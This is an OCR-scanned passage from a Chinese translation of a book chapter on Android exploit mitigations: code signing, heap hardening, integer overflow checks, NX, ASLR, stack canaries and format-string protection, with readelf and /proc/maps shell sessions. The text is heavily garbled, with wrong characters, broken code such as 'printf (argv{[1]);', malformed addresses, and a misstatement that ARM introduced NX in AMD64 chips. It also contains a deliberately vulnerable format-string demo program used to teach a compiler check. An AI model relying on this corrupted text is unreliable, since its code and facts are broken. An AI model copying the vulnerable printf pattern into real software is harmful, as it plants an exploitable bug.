链 ， 将 信任 归结 到 最 初 一 级 bootloader 代码 上 ， 这 一 级 通常 存储 在 专用 于 设备 引导 的 ROM 芯片 
之 中 。 在 有 的 设备 上 ，bootloader 的 最 后 一 级 还 会 验证 接 下 来 加 载 的 内 核 和 初始 化 RAM 空间 。 
在 极 少数 设备 上 ( 比如 Google TV )， 还 会 进一步 验证 每 个 内 核 模 块 的 签名 。 除 了 在 引导 时 验证 
代码 签名 ， 有 的 设备 还 会 在 刷 入 固件 时 进行 签名 检查 。 此 时 ，/system 分 区 通常 是 其 中 一 个 校 
验 目 标 。 再 次 强调 ， 每 种 设备 实现 这 些 保护 机 制 的 策略 都 不 尽 相 同 : 有 的 只 在 引导 时 验证 签名 ， 
有 的 只 在 刷机 时 验证 ， 还 有 的 对 这 两 个 环节 都 进行 验证 。 

除了 设备 引导 ， 代 码 签名 验证 还 被 用 于 OTA 升级 。OTA 升级 主要 通过 一 个 ZIP 文件 进行 ， 
其 中 包含 补丁 文件 、 新 增 文件 和 一 些 必要 的 配置 。 下 载 这 个 文件 后 ,系统 重启 至 恢复 模式 进行 升 
级 。 此 时 ，recovery 镜像 会 对 此 次 升级 的 内 容 进行 验证 并 安装 。ZIP 文件 的 内 容 经 过 可 信 CA 在 
密码 学 意义 上 的 签名 , 并 且 进 行 了 有 效 性 验证 , 从 而 防止 恶意 固件 被 升级 到 系统 中 。 比 如 ,Nexus 
设备 的 默认 recovery 镜像 就 拒绝 升级 任何 非 谷歌 签名 的 内 容 。 

Android 的 应 用 程序 也 使 用 了 代码 签名 ， 但 这 里 的 签名 并 不 能 链 式 地 追溯 到 某 个 可 信 的 根 
CA。 在 这 一 点 上 ， 苹 果 公 司 要 求 所 有 iOS 应 用 程序 都 由 可 信 源 签名 ， 而 谷歌 只 要 求 开 发 者 对 自 
己 的 软件 进行 自 签名 , 就 可 以 上 传 到 Google Play 市 场 了 。 由 于 无 法 链 式 追溯 到 可 信 CA， 普 通用 
户 必须 基于 签名 的 社区 信誉 度 来 判断 其 是 否 可 信 。 当 然 ， 是 否 已 经 在 Google Play 上 架 也 可 以 作 
为 判断 软件 及 其 开发 者 是 否 可 信 的 一 点 参考 。 

Android 虽然 广泛 使 用 了 代码 签名 ， 但 还 是 无 法 达到 iOS 那样 的 保护 能 力 。 首 先 ， 前 面 介绍 
的 这 些 机 制 在 iOS 上 也 都 得 到 了 采用 。 除 此 之 外 , 苹果 公司 还 基于 签名 来 判断 某 块 内 存 区 域 是 否 
可 以 作为 代码 执行 ,只 有 经 过 苹果 公司 自己 签名 的 代码 片段 才 允 许 被 执行 , 这 样 就 在 应 用 程序 通 
过 官方 市 场 的 审核 流程 后 ， 有 效 地 防止 了 下 载 并 加 载 可 执行 代码 或 注入 代码 。 在 iOS 里 , 唯一 的 
例外 是 一 块 被 标记 为 可 读 可 写 可 执行 的 内 存 ， 这 块 区 域 用 于 浏览 器 的 JIT 编译 。 通 过 与 其 他 缓解 
技术 相 结 合 ， 苹 果 公 司 的 代码 签名 机 制 让 传统 的 内 存 朋 演 型 攻击 变 得 极为 困难 ; 而 Android 并 未 
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在 此 方面 启用 代码 签名 , 因此 无 法 获得 相应 的 保护 能 力 , 无 论 是 内 存 侵入 型 攻击 还 是 在 软件 安装 
后 下 载 并 执行 新 的 代码 都 毫 无 问题 。 本 章 之 后 会 介绍 其 他 的 缓解 技术 , 它们 可 以 阻止 一 些 漏洞 利 
用 ， 但 并 不 影响 木马 的 攻击 。 


12.3 加固 堆 缓 冲 区 


在 第 一 种 针对 栈 缓冲 区 溢出 的 缓解 技术 出 现时 ， 堆 缓冲 区 溢出 攻击 就 开始 流行 起 来 。1999 
年 ,w00w00 安 全 团队 的 Matthew Conover 公 开 了 一 份 名 为 heaptut.txt 的 文件 :http://www.cgsecurity. 
org/exploit/heaptut.txt。 该 文档 介绍 了 堆 缓 冲 区 内 存 有 崩 演 可 能 带 来 的 后 果 。 随 后 出 现 了 各 类 公开 文 
档 ， 对 这 个 问题 的 探究 越 来 越 深 入 ， 包 括 针 对 特定 堆 实 现 方式 和 特定 应 用 程序 的 漏洞 利用 技术 。 
尽管 有 许多 资料 介绍 ， 堆 溢出 目前 仍 是 一 种 常见 的 漏洞 类 型 。 

抽象 地 来 看 , 堆 洪 出 的 利用 方法 主要 有 两 种 。 第 一 种 是 针对 应 用 程序 中 特有 的 数据 ， 导致 任 
意 代 码 执行 。 例 如 ， 攻 击 者 可 能 会 试图 通过 溢出 改写 软件 中 用 于 执行 shell 命令 的 安全 标志 位 或 
者 数据 。 第 二 种 方法 则 利用 底层 的 堆 缓冲 区 实现 机 制 , 通常 是 针对 堆 分 配器 所 使 用 的 元 数据 。 经 
典 的 双 链 表 节 点 删除 技术 就 是 一 个 例子 ， 不 过 该 技术 公布 后 ， 又 陆续 出 现 了 许多 其 他 攻击 技术 。 
第 二 种 方法 更 加 流行 , 因为 它 对 整个 操作 系统 甚至 同系 列 版 本 操作 系统 上 的 每 个 堆 溢 出 漏洞 都 有 
效 ， 更 加 通用 。 如 何 缓解 这 类 攻击 则 依 堆 缓 冲 区 的 不 同 实现 而 各 蜡 。 

Android 使 用 Doug Lea 设计 的 内 存 分 配器 的 修改 版 本 dumalloc。Android 对 其 的 定制 修改 非 
常 少 ， 未 涉及 安全 保护 功能 。 在 本 书写 作 时 ，Android 上 游 源 使 用 的 dlmalloc 版 本 是 2.8.6， 其 中 
已 经 包括 了 许多 加 固 措 施 。 比 如 ， 如 果 不 采 用 额外 的 技巧 , 经 典 的 双 链 表 节 点 删除 攻击 在 这 个 环 
境 下 是 无 效 的 。 第 8 章 已 经 详细 介绍 了 这 些 缓解 技术 在 Android 中 的 工作 原理 。 第 一 版 发 布 时 ， 
Android 就 已 经 使 用 了 这 个 加 固 后 的 dumalloc 版 本 。 

12.4 ”防止 整数 溢出 

整数 溢出 〈 漏 洞 ) 可 以 导致 许多 类 型 的 非 预期 行为 。 目 前 主流 的 CPU 使 用 32 位 或 64 位 的 
寄存 器 来 表示 整数 , 大 小 有 限 。 当 算术 运算 产生 的 结果 超出 这 个 有 限 的 表示 范围 时 ,超出 的 位 将 
被 舍弃 ， 未 超出 的 位 则 被 存 到 结果 寄存 器 的 空间 中 ， 这 就 是 所 谓 的 同 余 算 术 。 例 如 ， 当 0x8000 
和 0x20000 这 两 个 数 相 乘 时 ， 结 果 是 0x100000000。 但 是 32 位 寄存 器 所 能 表示 的 最 大 值 是 
0Oxffffffff， 因 此 最 高 的 那 一 位 不 会 被 存储 到 这 个 寄存 器 中 ， 最 终 的 结果 是 0x00000000。 整 数 游 出 
可 能 导致 程序 崩溃 、 价 格 计算 错误 或 者 其 他 运行 时 间 题 ， 最 值得 关注 的 后 果 是 内 存 出 错 。 例 如 ， 
如 果 将 一 个 这 样 的 值 传 给 内 存 分 配 函 数 ， 就 会 分 配 一 个 远 小 于 预期 的 缓冲 区 。 

2002 年 8 月 5 日 ， 资 深 安全 人 研究 员 Florian Weimer 在 当时 很 流行 的 Bugtraq 邮件 列表 上 发 布 
了 多 个 C 运 行 时 库 中 calloc 函数 的 一 个 严重 漏洞 。 这 个 函数 使 用 了 2 个 参数 : 要 申请 的 内 存 空 
间 单 元 数量 以 及 每 个 单元 的 大 小 。 它 会 在 内 部 将 这 两 个 参数 的 值 相 乘 ， 并 将 结果 传递 给 malloc 
函数 。 问 题 的 关键 是 ， 有 漏洞 的 C 运行 时 库 不 会 检查 相 乘 时 是 否 出 现 了 整数 溢出 。 因 此 ， 如 果 相 
乘 的 结果 大 于 32 位 整数 ， 这 个 函数 最 终 将 返回 一 个 远 小 于 调用 者 预期 的 内 存 缓冲 区 。 后 来 这 个 
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问题 得 到 修复 ， 在 发 生 整 数 溢出 时 返回 NULL。 

Android 安全 团队 在 Android 第 一 版 发 布 之 前 就 已 经 修复 了 这 个 漏洞 ,因此 所 有 Android 版 本 
都 不 受 其 影响 。Android 的 安全 文档 将 这 个 对 calloc 所 作 的 修改 吹 叫 为 安全 加 固 ， 但 是 绝 大 部 
分 的 安全 研究 员 不 认为 这 是 安全 加 固 : 只 是 避免 了 一 个 已 知 的 安全 漏洞 而 已 。 事实 上 ,这 个 问题 
甚至 从 未 被 分 配 CVE 编号 。 我 们 并 不 认为 Android 安全 团队 的 这 一 工作 是 漏洞 利用 缓解 ， 不 过 
出 于 完整 性 考虑 顺带 提 及 。 

此 外 ,Android 还 使 用 了 一 种 更 为 全 局 性 的 方法 来 防止 整数 溢出 。 它 引入 了 Google Chrome OS 
开发 者 Will Drewry 所 开发 的 一 套 库 ， 名 为 safe iop ( safe integer operations， 安 全 的 整数 运算 )。 
该 库 提供 了 各 种 特别 编写 的 算术 运算 函数 , 在 整数 溢出 发 生 时 会 返回 失败 。 该 库 可 以 蔡 代 编程 语 
言 中 自 带 的 算术 运算 符 , 用 于 对 整数 运算 比较 敏感 的 地 方 ， 比 如 计算 一 块 动态 分 配 的 内 存 大 小 或 
者 累加 一 个 引用 计数 器 。 从 第 一 个 版 本 开始 ，Android 就 加 入 了 这 个 库 。 

撰写 这 本 书 时 ,我 们 仔细 调查 了 Android 对 safe iop 的 使 用 -此 时 的 最 新 版 本 是 Android 4.2.2， 
其 中 只 有 5 个 源 文件 含有 safe iop 库 的 头 文件 .进一步 观察 后 发 现 , 该 库 中 safe_add、safe_mul 
和 safe_sub 因数 的 使 用 次 数 分 别 是 5 次 .2 次 和 0 次 。 使 用 这 些 两 数 的 主要 是 Bionic 的 libc 库 、 
官方 recovery 中 的 minizip 和 Dalvik 的 libdex 库 。Android 使 用 的 safe iop 版 本 似乎 已 经 过 期 了 。 
这 个 库 目 前 的 上 游 版 本 是 0.4.0， 并 且 包 含 了 许多 进入 0.5.0 的 commit。AOSP 中 的 一 个 commit 
指向 了 版 本 0.3.1， 也 就 是 当前 的 已 发 布 版 本 。 不 过 在 代码 变更 日 志 中 ，safe_iop.h 头 文件 并 未 包 
含 版 本 0.3.1。 总 的 来 说 ， 这 个 库 并 未 得 到 广泛 而 有 价值 的 使 用 ， 让 人 惰 惜 。 


12.5 阻止 数据 执行 


现代 操作 系统 为 了 对 抗 任意 代码 执行 类 型 的 攻击 , 广泛 采用 的 漏洞 利用 缓解 技术 是 阻止 数据 
执行 。 基 于 哈佛 结构 的 计算 机 自 带 这 种 保护 机 制 , 因为 这 类 系统 从 物理 上 将 存储 代码 和 存储 数据 
的 内 存 分 离开 来 。 不过， 包括 基于 ARM 的 设备 在 内 ， 只 有 极 少 系统 完全 使 用 这 种 架构 。 

现在 的 计算 机 系统 大 都 基于 一 种 修改 后 的 哈佛 结构 或 冯 : 诺 依 曼 结构 。 这 些 结构 允许 代码 
和 数据 在 相同 的 内 存 中 共存 ， 因 此 可 以 从 磁盘 上 加 载 程 序 并 执行 ,软件 升级 也 变 得 更 为 容易 。 从 
通用 计算 机 的 便利 性 要 求 来 看 , 这 个 特性 是 极其 重要 的 , 因此 这 些 系 统 只 能 部 分 要 求 代码 和 数据 
分 离 。 在 设计 缓解 机 制 时 ， 研 究 员 会 特别 针对 数据 段 被 执行 的 情况 。 

2000 和 2002 年 ,PaX 团队 的 pipacs 分 别 创造 了 两 种 在 i386 平台 上 防止 数据 执行 的 技术 。i386 
平台 不 支持 在 页 表 中 将 内 存 标记 为 不 可 执行 , 因此 这 两 种 纯 软 件 技术 使 用 了 一 些 平时 极 少 用 到 的 
硬件 特性 。2000 年 ，PaX 发 布 了 名 为 PAGEEXEC 的 技术 ， 它 使 用 CPU 中 的 TLB ( 快 表 ) 缓存 
机 制 来 阻止 对 数据 的 执行 。2002 年 ，PaX 又 发 布 了 名 为 SEGMEXEC 的 技术 ， 它 使 用 i386 系列 
处 理 器 中 的 段 机 制 ， 将 用 户 空 间 内 存 分 为 存储 数据 和 存储 代码 的 两 类 。 当 CPU 从 内 存 的 数据 存 
储 区域 中 取 指 令 时 ， 出现 的 缺 页 错误 会 使 内 核 阻 止 数据 执行 。 PaX 为 了 让 这 些 技术 被 广泛 采纳 而 
努力 奋斗 ， 但 是 许多 Linux 发 行 版 最 终 还 是 采用 了 SEGMEXEC 技术 的 一 个 变种 : exec-shield。 
这 些 技巧 都 早 于 现代 的 数据 执行 阻止 技术 ， 很 可 能 为 后 者 提供 了 灵感 。 
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现在 的 设备 使 用 将 硬件 和 软件 相 结合 的 方法 来 阻止 数据 执行 。 当 前 的 ARM 和 x86 处 理 器 都 
支持 这 个 特性 ， 不 过 各 个 平台 在 使 用 这 个 技术 时 的 术语 有 些许 差异 。ARM 在 AMD64 系列 处 理 
器 (例如 Athlon 64 和 Opteron ) 中 首先 引入 了 对 NX (Never Execute ) 的 硬件 支持 。 此 后 ，Intel 
在 奔腾 4 系列 处 理 器 中 引入 了 XD (eXecute Disable )。ARM 则 从 ARMv6 架构 起 开始 支持 XN 
( eXecute Never )。HTC Dream ( 也 就 是 众所周知 的 G1 或 ADP1 ) 就 使 用 了 这 种 处 理 器 设计 。 

无 论 是 ARM 还 是 x86 架构 ， 操 作 系 统 内 核 都 必须 使 用 这 一 特性 ， 将 某 些 内 存 区 域 标记 为 不 
应 该 被 执行 。 如 果 程 序 试图 执行 这 些 内 存 区 域 , 就 会 产生 一 个 处 理 器 执行 错误 ,然后 提交 给 操作 
系统 内 核 ,内 核 处 理 这 个 错误 的 方法 是 向 产生 问题 的 进程 发 送 一 个 信号 ,这 通常 会 使 其 终止 执行 。 

对 一 个 程序 而 言 ， 除 非 它 包 含 没 有 设置 可 执行 标志 的 GNU_STACK 程序 头 ， 否 则 Linux 内 核 
就 会 将 其 栈 所 在 的 内 存 标记 为 可 执行 。 编 译 程序 时 ， 如 果 将 -znoexecstack 选项 传 给 编译 工具 
链 ， 编 译 器 就 会 在 生成 的 可 执行 文件 中 插入 这 个 程序 头 。 如 果 不 存在 eCNU_sTACK 程序 头 ， 或 者 
存在 但 可 执行 标志 被 置 上 , 那么 栈 就 是 可 执行 的 。 受 此 影响 , 所 有 其 他 可 读 的 内 存 映射 也 都 是 可 
执行 的 。 

可 以 使 用 execstack 或 者 readelf 工具 来 判断 某 个 二 进 制 可 执行 文件 中 是 否 包含 这 样 的 
得 序 头 。 大 部 分 Linux 发 行 版 上 都 有 这 两 个 工具 ， 在 AOSP 仓库 中 也 能 找到 。 下 面 摘录 了 如 何 用 
这 两 个 工具 判断 栈 的 可 执行 状态 : 


dev:~/android $ execstack -q cat* 
? cat-gl 

- cat-gn-takju 

X cat-gn-takju-CLEARED 
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dev:~/android $ readelf -a cat-gl | grep GNU_STACK 


dev:~/android $ readelf -a cat-gn-takju | grep GNU_STACK 
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0 


dev:~/android $ readelf -a cat-gn-takju-CLEARED | grep GNU_STACK 
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RWE 0 


代码 倒数 第 3 行 的 RW 和 倒数 第 1 行 的 RWE 加 粗 

除了 这 些 工具 ,还 可 以 通过 proc 文件 系统 中 的 maps 文件 来 判断 内 存 映射 是 否 可 执行 。 下 而 
摘录 了 在 运行 Android 4.2.1 的 Galaxy Nexus 和 运行 Android 2.2.2 的 Motorola Droid 上 使 用 cat 
工具 查看 映射 情况 的 结 

shell@android:/ $ # on the Galaxy Nexus running Android 4.2.1 

shell@android:/ $ cat /proc/self/maps | grep -BE '(stack|lheap)' 


409e4000-409ec000 rw-p 00000000 00:00 0 [heap] 
bebaf000-bebd0000 rw-p 00000000 00:00 0 [stack] 




















$ # on the Motorola Droid running Android 2.2.2 

$ cat /proc/self/maps | grep -E '(stack|heap)' 
0001c000-00022000 rwxp 00000000 00:00 0 [heap] 
beal3000-bea14000 rwxp 00000000 00:00 0 [stack] 


maps 文件 中 的 每 一 行 都 包括 一 块 内 存 区 域 的 起 止 地 址 、 权 限 、 页 偏 移 地 址 、 设 备 主编 号 和 
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次 编号 、 文 件 的 inode 编号 以 及 该 内 存 区 域 的 名 字 。 从 结果 的 权限 部 分 可 以 看 到 ，Galaxy Nexus 
中 的 栈 和 堆 是 不 可 执行 的 ， 但 是 在 较 老 的 Motorola Droid 中 ， 栈 和 堆 都 是 可 执行 的 。 

在 Android 1.5 发 布 时 ，Linux 内 核 就 已 经 有 了 这 个 缓解 机 制 ， 不 过 Android 系统 中 的 二 进 制 
可 执行 文件 在 编译 时 并 未 启用 对 这 一 特性 的 支持 。2010 年 5 月 5 日 ， 编 号 为 2915cc3 的 commit 
加 入 了 这 一 支持 。 两 周 后 发 布 的 Android 2.2 ( 冻 酸 奶 ) 并 未 使 用 这 个 保护 措施 。 直 到 下 一 个 版 本 
Android 2.3( 姜 饼 ) 发 布 时 ， 才 最 终 将 这 一 缓解 技术 用 在 用 户 的 终端 设备 上 。 不 过 ， 有 一 些 姜 饼 
设备 只 是 部 分 实现 了 这 一 缓解 技术 ,例如 运行 Android 2.3.4 的 索尼 Xperia Play 手机 。 下 面 节选 
了 这 一 设备 上 栈 和 堆 的 内 存 映 射 结 

S # on a Sony Xperia Play with Android 2.3.4 

S cat /proc/self/maps | grep -BE '(stack|heap)' 


0001c000-00023000 rwxp 00000000 00:00 0 [heap] 
7e9af000-7e9pb0000 rw-p 00000000 00:00 0 [stack] 


可 以 看 到 , 这 里 的 栈 是 不 可 执行 的 , 但 堆 中 的 数据 依然 可 以 执行 。 查看 这 个 设备 的 内 核 代码 ， 
可 以 发 现 保持 堆 的 可 执行 是 出 于 遗留 的 兼容 性 问题 考虑 ， 不 过 还 不 清楚 是 否 真 正 有 必要 。2010 
年 6 月 发 布 的 Android NDK 4b 版 启用 了 这 个 缓解 机 制 。 自 此 以 后 , 所 有 版 本 的 AOSP 和 NDK 都 
默认 启用 这 一 编译 器 选项 。 有 了 这 个 保护 技术 , 攻击 者 就 无 法 直接 执行 位 于 不 可 执行 映射 区 的 本 
地 代码 。 


12.6 ”地 址 空间 布局 随机 化 


地 址 空间 布局 随机 化 ( ASLR ) 是 一 种 将 炉 引入 进程 内 存 地 址 空间 的 缓解 技术 ,最初 由 PaX 
团队 在 2001 年 作为 一 种 临时 应 对 方案 发 布 。 在 其 出 现 之 前 ， 绝 大 部 分 漏洞 利用 代码 都 依赖 于 硬 
编码 的 地 址 。 尽 管 这 并 不 是 严格 的 规定 , 但 当时 的 漏洞 利用 开发 者 通常 使 用 这 样 的 地 址 来 简化 开 
发 工作 。 

整个 操作 系统 内 核 中 的 多 处 地 方 都 已 经 实现 了 这 个 缓解 机 制 。 然 而 ， 和 防止 数据 执行 一 样 ， 
内 核 是 否 启用 ASLR 取决 于 二 进 制 可 执行 代码 模块 中 的 信息 , 也 就 是 说 , 还 需要 编译 右 工 具 链 的 
相应 支持 。 

Linux 内 核 提 供 了 多 种 内 存 区 域 , 包括 提供 brk 和 mmap 系统 调用 使 用 的 区 域 、 栈 内 存 空间 
和 其 他 区 域 。prk 系统 调用 创建 的 内 存 区 域 用 于 进程 存储 堆 中 的 数据 。mmap 系统 调用 负责 将 库 
文件 、 普 通 文 件 和 其 他 共享 内 存 映射 到 进程 的 虚拟 地 址 空间 。 栈 内 存 空 间 则 在 进程 创建 时 就 被 
分 配 好 了 。 

ASLR 的 原理 是 将 炉 的 概念 引入 这 些 调 用 所 分 配 的 虚拟 地 址 空间 。 由 于 这 些 区 域 被 创建 在 多 
个 地 方 ,将 每 块 内 存 区 域 随机 化 需要 进行 专门 的 考量 并 一 一 实现 。 因 此 ，ASLR 通常 会 分 阶段 实 
现 。 从 过 去 的 情况 来 看 ， 同 一 个 操作 系统 会 在 各 个 版 本 中 支持 越 来 越 多 的 ASLR。 只 有 当 所 有 可 
能 的 内 存 段 都 被 随机 化 时 ， 才 能 称 该 操作 系统 实现 了 “完全 的 ASLR 支持 ”。 

即便 系统 完全 支持 ASLR 了 , 特定 进程 的 地 址 空间 也 不 一 定 会 被 完全 随机 化 。 如 果 在 编译 时 
遗漏 了 开启 这 类 特性 所 需 的 编译 絮 标 志 ， 生 成 的 可 执行 文件 就 不 支持 ASLR， 无 法 被 随机 化 。 例 
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如 ， 要 生成 位 置 无 关 可 执行 文件 ( Position-Independent Executable，PIE )， 就 需要 在 编译 时 传人 
-fPIE 或 者 -pie 标志 。 使 用 reagdelf 工具 可 以 判断 二 进 制 文件 在 编译 时 是 否 开启 了 这 些 标 志 ， 
如 下 所 示 : 


dev:~/android $ # cat binary from Android 1.5 
dev:~/android $ readelf -h cat-gl | grep Type: 
Type: EXEC (Executable file) 








dev:~/android $ # cat binary from Androiqd 4.2.1 
dev:~/android $ readelf -h cat-gn-takju | grep Type: 
Type: DYN (Shared object file) 


当 二 进 制 可 执行 文件 支持 基地 址 的 随机 化 时 ， 其 类 型 是 DYN; 不 支持 则 类 型 是 ExEc。 从 前 
面 的 输出 可 以 看 出 , 来 自 G1 的 cat 文 件 无 法 被 随机 化 ， 而 来 自 Galaxy Nexus 的 cat 文 件 可 以 。 要 
验证 这 一 点 ， 还 可 以 通过 多 次 查看 proc 文件 系统 下 的 maps 文件 对 基地 址 进行 采样 ， 如 下 所 示 : 


# # two consecutive samples on Android 1.5 
# /system/bin/toolbox/cat /proc/self/maps | head -1 











00008000-00018000 r-xp 00000000 1f:03 520 /system/bin/toolbox 
# /system/bin/toolbox/cat /proc/self/maps | head -1 
00008000-00018000 r-xp 00000000 1f:03 520 /system/bin/toolbox 


shell@android:/ $ # two consecutive samples on Android 4.2.1 
shell@android:/ $ /system/bin/cat /proc/self/maps | grep toolbox | \ 


head -1 
4000e000-4002b000 r-xp 00000000 103:02 267 /system/bin/toolbox 
shell@android:/ $ /system/bin/cat /proc/self/maps | grep toolbox | \ 
head -1 
40078000-40095000 r-xp 00000000 103:02 267 /system/bin/toolbox 





上 面 的 结果 清楚 地 显示 ，Android 4.2.1 上 有 相应 的 二 进 制 基地 址 随机 化 。 这 一 点 可 以 从 该 二 
进 制 文件 代码 区 域 中 起 止 地 址 的 第 一 个 数字 看 出 来 。 在 两 次 连续 的 执行 中 , 分 别 对 应 的 基地 址 是 
不 同 的 ， 分 别 为 0x4000e000 和 0x40078000。 和 预期 一 样 ， 在 Android 1.5 上 ， 二 进 制 文件 的 基地 
址 并 未 被 随机 化 。 





注意 Android 中 的 cat 程序 通常 只 是 toolbox 二 进 制 文件 的 一 个 符号 链接 。 此 外 ，Android 提供 
的 shell 经 常会 内 建 一 条 cat 命令 。 在 这 样 的 系统 上 ， 需 要 执行 /system/bin/cat 来 获得 精 
确 的 (多 次 执行 ) 采样 结果 。 


另外 需要 注意 的 内 存 区 域 是 vdso 区 域 (x86 ) 或 者 vectors 区 域 (ARM )。 这 类 内 存 映射 可 以 
帮助 内 核 更 轻松 、 更 快速 地 进行 通信 。 但 是 直到 2006 年 ，x86 Linux 才 完 成 vdso 区 域 的 随机 化 。 甚 
至 在 内 核 支持 vdso 的 随机 化 以 后 ,一些 Linux 发 行 版 又 过 了 很 久 才 启用 其 所 需 的 内 核 配 置 选项 。 

与 其 他 现代 操作 系统 一 样 ，Android 对 ASLR 的 支持 也 是 分 阶段 完成 的 。 虽然 它 在 4.0 中 引 
入 了 最 初 的 支持 ， 但 是 仅仅 实现 了 对 栈 和 mmap 系统 调用 所 创建 区 域 (包括 动态 链接 库 ) 的 随 
机 化 。Android 4.0.3 在 commitd707fb3 中 实现 了 对 堆 空 间 的 随机 化 ， 但 是 动态 链接 器 ( linker ) 
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本 身 的 随机 化 并 未 实现 。 第 8 章 和 第 9 章 介 绍 了 Georg Wicherski 和 Joshua J Drake 开发 的 浏览 
器 漏洞 利用 ,其 中 涉及 这 一 点 。 接 下 来 ，Android 4.1.1 作出 了 较 大 的 改进 , 为 linker 和 所 有 其 他 
的 系统 二 进 制 文件 加 入 了 炉 。 在 本 书写 作 时 ，Android 已 经 几乎 完全 支持 ASLR 了 , 未 被 随机 化 
的 内 存 只 剩 vectors 区 域 。 








注意 ”将 多 种 缓解 机 制 一 层 层 地 结合 起 来 是 纵深 防御 的 一 种 形式 ， 可 以 极 大 地 提高 有 效 漏洞 利 
用 的 创建 难度 。 最 好 的 例子 就 是 ASLR 和 XN 同时 完全 启用 的 情形 ; 如 果 单 独 使 用 ， 它 
们 起 到 的 作用 则 很 有 限 。 如 果 没 有 完全 启用 ASLR, 攻击 者 就 可 以 使 用 第 9 章 介绍 的 ROP 
技术 来 绕 过 XN。 如 果 完 全 启用 ASLR 而 没有 XN， 也 很 容易 被 堆 喷射 (heap spraying ) 
之 类 的 技术 攻陷 。 这 些 缓解 技术 相辅相成 ， 最 终 构成 更 强 的 安全 防护 。 


12.7 保护 栈 


1997 年 ，Crispin Cowan 创造 了 一 种 叫 作 StackGuard 的 保护 技术 ， 用 于 对 抗 基于 栈 的 缓冲 区 
淤 出 。 这 种 保护 技术 的 工作 原理 是 在 当前 栈 帧 保存 的 返回 地 址 之 前 存储 一 个 探测 值 。 这 个 探测 值 
有 时 称 为 cookie 值 , 在 函数 的 起 始 代 码 处 被 动态 地 创建 出 来 。 创建 该 值 的 代码 则 是 由 编译 器 在 编 
译 时 插入 可 执行 文件 的 。 这 个 探测 值 最 初 由 全 0 构成 ,后 来 升级 为 使 用 随机 的 cookie 值 ， 以 应 对 
发 生 memcpy 操作 时 的 缓冲 区 溢出 攻击 。 最 后 ，StackGuard 不 再 有 人 维护 ， 其 他 栈 保 护 机 制 陆续 
被 创造 出 来 并 得 以 实现 。 

为 填补 StackGuard 的 空缺 ，IBM 的 Hiroaki Etoh 开创 了 一 个 名 为 ProPolice 的 项 目 ， 又 叫 作 
SSP， 即 Stack-Smashing-Protector ( 直译 为 “ 栈 粉碎 保护 器 ”) 的 缩写 。ProPolice 与 StackGuard 
有 许多 不 同 之 处 : 第 一 ，IBM 在 编译 器 的 前 端 而 非 后 端 实现 了 这 一 保护 机 制 ; 第 二 ，IBM 进 一 
步 扩展 了 保护 范围 , 而 不 仅仅 是 针对 被 保护 函数 的 返回 地 址 ; 第 三 , 函数 中 的 变量 会 被 重新 排序 ， 
使 溢出 一 个 缓冲 区 或 者 数组 后 影响 到 其 他 局 部 变量 的 可 能 性 变 小 ; 第 四 , ProPolice 会 复制 一 份 函 
数 参 数 ,同样 保护 它们 免 受 溢出 的 影响 。 现 在 , ProPolice 已 经 成 为 GCC 的 标准 , 在 包括 Android 
在 内 的 许多 操作 系统 中 都 默认 启用 。 

在 Android 中 ， 使 用 GCC 编译 器 时 传人 -fstack-protector 标志 会 启用 ProPolice 栈 保 护 
机 制 。 Android 从 第 一 个 公开 版 本 (1.5 ) 开始 就 一 直 支 持 这 个 特性 。 除了 用 于 操作 系统 自身 , Android 
NDK 的 这 一 缓解 机 制 也 被 作为 默认 项 提供 给 第 三 方 开发 者 。 这 样 , 所 有 编译 产生 的 二 进 制 代码 都 
能 默认 得 到 保护 。Android 很 早 就 开始 使 用 这 一 缓解 机 制 ， 让 许多 栈 缓冲 区 溢出 漏洞 无 法 被 利用 。 


12.8 保护 格式 化 字符 串 
格式 化 字符 串 漏洞 是 一 类 很 有 趣 的 问题 。 第 一 次 发 现 并 公布 这 种 问题 时 , 许多 人 都 惊讶 于 这 


种 错误 竟然 可 以 被 利用 。 随 着 越 来 越 多 的 人 开始 了 解 和 利用 这 类 问题 , 对 其 缓解 的 研究 也 开始 了 。 
2001 年 ， 多 位 研究 人 员 共 同 发 表 了 题 为 "FormatGuard: Automatic Protection From printf Format 
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String Vulnerabilities” 的 论文 。 现 在 , 已 经 出 现 了 许多 应 对 该 问题 的 缓解 技术 , 不 少 都 在 上 述 论文 
中 有 所 介绍 。 

其 中 一 种 策略 是 在 编译 代码 时 传人 一 些 特殊 的 编译 参数 , 让 编译 器 检查 代码 中 是 否 存在 可 能 
被 利用 的 格式 化 字符 串 。 将 这 种 保护 方法 称 为 缓解 技术 也 许 不 太 恰 当 , 因为 它 试图 完全 防止 这 些 
问题 进入 运行 时 系统 ， 而 不 是 防止 逃脱 检测 的 问题 被 利用 。 要 使 用 这 个 保护 方法 ， 只 需 在 编译 代 
人 码 时 将 -Wformat-security 和 -Werror=format-security 这 两 个 参数 传 给 编译 器 即 可 。 下 
面 的 shell 会 话 展 示 了 启用 这 些 参数 后 编译 器 的 行为 : 


dev:~/android $ cat fmt-test1.cC 
#include <stdio.h> 



































int main(int argc, char *argv[]) { 
printf (argv{[1]); 
return 0; 


} 

dev:~/android $ gcc -Wformat-security -Werror=format-security -o test \ 
fmt-testil.c 

fmt-testl.c: In function 'main': 

fmt-test1l.c:3:3: error: format not a string literal and no format 
arguments [-Werror=format-securityl] 

ccl: some warnings being treated as errors 

dev:~/android $ ls -1 test 

ls: cannot access test: No such file or directory 


可 以 看 到 ， 编 译 需 打印 出 了 一 个 错误 ,并 没有 生成 可 执行 文件 。 编 译 需 成 功 检测 到 一 个 非常 
量 字符 串 被 作为 格式 化 字符 串 参 数 传递 给 了 printf 函数 。 这 样 的 非常 量 字 符 串 可 以 被 攻击 者 控 
制 ， 因 此 可 能 会 出 现 安全 漏洞 。 

不 过 该 保护 技术 并 不 够 全 面 , 许多 存在 漏洞 的 程序 无 法 被 检测 出 来 。 例如 ， 下 面 这 段 代 码 不 
会 造成 任何 警告 ， 因 此 生成 了 可 执行 文件 : 


dev:~/android $ cat fmt-test2.c 
#include <stdio.h> 




















int main(int argc, char *argv[]) { 
printf(argv[1], argc); 
return 0; 


} 

dev:~/android $ gcc -Wformat-security -Werror=format-security -o test \ 
fmt-test2.c 

dev:~/android $ ls -1 test 

dev:~/android $ ./test %x 

党 


这 样 的 情况 还 有 许多 。 如 果 一 个 函数 使 用 了 stdarg.h 头 文件 提供 的 可 变 参 数 功能 ( 即 该 函数 
接受 的 参数 数量 并 不 固定 )，GCC 就 会 通过 format 函数 属性 来 实现 这 种 保护 。 下 面 这 段 代 
